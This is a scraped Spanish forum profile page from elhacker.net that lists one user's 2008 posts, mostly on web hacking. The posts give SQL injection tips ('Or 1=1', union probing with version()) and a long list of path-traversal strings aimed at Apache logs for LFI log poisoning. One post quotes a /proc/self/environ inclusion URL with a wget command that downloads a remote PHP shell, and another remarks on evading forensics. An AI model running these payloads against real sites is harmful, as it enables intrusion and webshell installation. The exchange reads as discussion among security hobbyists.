Kool, me gusto mas la version en Español, suena y se lee mas original que la version en Ingles XD
-berz3k.
-berz3k.
- Bienvenido a Test Foro de elhacker.net SMF 2.1.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#212
Nivel Web / Re: ayuda con sql iyeccion
13 Octubre 2008, 18:54 PM
Seguramente no es el campo indicado, cambia los numeros por "NULL" y agrega version(). @@version o now(), solo para saber que campo es el valido. de ahi partes para injectar dependiendo de la base de datos.
-berz3k.
-berz3k.
#213
Nivel Web / Re: Web vulnerabilities to gain access to the system
13 Octubre 2008, 18:48 PM
Lei el paper pepeluxx, siento que algunas cosas se puede automatizar mas mediante algun tipo de fuzzer sin usar tanto "perl" para vulnerabilidades ya conocidas y tan "trilladas" como LFI, RFI , Blind, me gusta usar las tools de mandingo las conoceis ? ademas de uno que otro fuzzer que realmente vale la pena, tambien es posible mejorar algunos vectores que igual valdria la pena agregar a tu paper y/o mencionar.
Seguramente te falto mencionar estos Vectores aunque no he ordenado algunos mas, donde tambien son interesantes.
Vaya interesante no le conocia, las referencias que agregas respecto a esta tecnica, se menciona algo como esto:
Antes de realizarlo se tedria que conocer el verdaro PATH de donde es encuentra el proc, estoy en slackware y sunOs x86 cambia bastante, una lista de ello haria falta, que tambien no esta referenciado, pepeluxx tu paper me da la impresion de que basado en su gran mayoria en el mismo que haces referencia
http://www.g-brain.net/tutorials/local-file-inclusions.txt
Mmm pepeluxx te haz leido el paper de codebreak de w4cking.com mmm me parece existe un video tambien, pero la moda es hacerlo funcionar ya no solo en .jpg , gif etc, es interesante usarlo en . swf y hasta en video .flv. mpeg :-) , bueno la idea me la dio sirdarckcat y quedo de lujo, los forenses no encuentran nada XDD
Hey pepeluxx te ha quedado de lujo, esperamos la version en Spanish que seria un poco mas entendible y original para la Spanish Race.... mantenos informado de la version sobre este mismo hilo.
-berz3k.
Código [Seleccionar]
-----[ 2.2.1 - Injecting PHP code into apache logs
Seguramente te falto mencionar estos Vectores aunque no he ordenado algunos mas, donde tambien son interesantes.
Código [Seleccionar]
"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../.. /../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log"
);
Código [Seleccionar]
----[ 2.2.2 - Injecting PHP code into process table
Vaya interesante no le conocia, las referencias que agregas respecto a esta tecnica, se menciona algo como esto:
Código [Seleccionar]
url = 'http://www.g-brain.net/index.php?page=../../../proc/self/environ'
cmd = 'wget http://www.g-brain.net/fish.txt -O fish.php;rm wget-log'Antes de realizarlo se tedria que conocer el verdaro PATH de donde es encuentra el proc, estoy en slackware y sunOs x86 cambia bastante, una lista de ello haria falta, que tambien no esta referenciado, pepeluxx tu paper me da la impresion de que basado en su gran mayoria en el mismo que haces referencia
http://www.g-brain.net/tutorials/local-file-inclusions.txt
Código [Seleccionar]
-----[ 2.2.3 - Injecting PHP code into an image
Mmm pepeluxx te haz leido el paper de codebreak de w4cking.com mmm me parece existe un video tambien, pero la moda es hacerlo funcionar ya no solo en .jpg , gif etc, es interesante usarlo en . swf y hasta en video .flv. mpeg :-) , bueno la idea me la dio sirdarckcat y quedo de lujo, los forenses no encuentran nada XDD
Hey pepeluxx te ha quedado de lujo, esperamos la version en Spanish que seria un poco mas entendible y original para la Spanish Race.... mantenos informado de la version sobre este mismo hilo.
-berz3k.
#214
Nivel Web / Re: Ayuda en inyeccion SQL --TABLA!!!
9 Octubre 2008, 03:54 AM
Seguramente la web no sera vulnerable , no te envia mensaje de error en "sintaxis" y si tampoco te acepta el True/False mmm sera dificil obtener data de la Base de Datos/Server y no precisamente para hacer un deface.
-berz3k.
-berz3k.
#215
Nivel Web / Re: Scanner RFI simple en PHP
8 Octubre 2008, 17:51 PM
Pepeluxx , vaya lo he probado mmm bastante casero comparado con otros programas de "audit source code" , algunas fallas y warnings al ejecutar mmm pero lo puedo mejorar con un poco de tiempo, ya que me he programado un code , para auditar diferentes lenguajes Asp.net, VB, C# , etc sobre todo ahora que ando en una "auditoria de codigo" y tengo un monton de lineas que leer, mmm basicamente programe mis vectores sobre un .XML para hacerlo un poco mas ameno el trabajo, aunque aun me falta la parte para reportear en .html
-berz3k.
-berz3k.
#216
Nivel Web / Re: Ayuda en inyeccion SQL --TABLA!!!
8 Octubre 2008, 17:42 PM
Mmm no siempre lograras escapar con los clasicos "metachars" y otra mas no siempre veras el msg de error para lograr el SQLi, mmmm se me ocurre Blind aunque tambien puedes usar los clasicas conversiones logicas (True False) para comprobar la injeccion
e.g
e.g
Código [Seleccionar]
Or 1=1
Or 'p'='p'
etc
etc
#217
Nivel Web / Re: Scanner RFI simple en PHP
7 Octubre 2008, 02:40 AM
Vale pepeluxx, lo pruebo y te comento.
-berz3k.
-berz3k.
#218
Nivel Web / Re: Scanner RFI simple en PHP
6 Octubre 2008, 18:16 PM
@pepeluxx
No veo por ningun lado la tool/fuzzer que comentas pepelux, post link or source code
-berz3k.
No veo por ningun lado la tool/fuzzer que comentas pepelux, post link or source code
-berz3k.
#219
Programación C/C++ / Re: super pack de 14o problemas de borland c++ desarrollados
5 Octubre 2008, 04:42 AM
El link anteriormente posteado por fiisi sigue rulando, no se que problemas tengas Shadoweps.
-berz3k.
-berz3k.
#220
Java / Re: [Source] Space Invaders
2 Octubre 2008, 08:22 AM
Hey esta "chido" el space invaders, si tengo tiempo le metere algo personalizado.
-berz3k.
-berz3k.